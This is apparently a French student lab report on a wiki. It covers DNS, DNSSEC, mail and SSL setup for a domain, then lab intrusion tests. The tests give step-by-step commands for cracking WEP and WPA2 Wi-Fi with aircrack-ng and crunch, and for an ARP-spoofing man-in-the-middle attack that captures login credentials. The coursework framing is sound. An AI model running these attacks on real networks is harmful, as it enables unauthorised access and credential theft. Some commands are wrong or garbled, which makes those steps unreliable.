Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
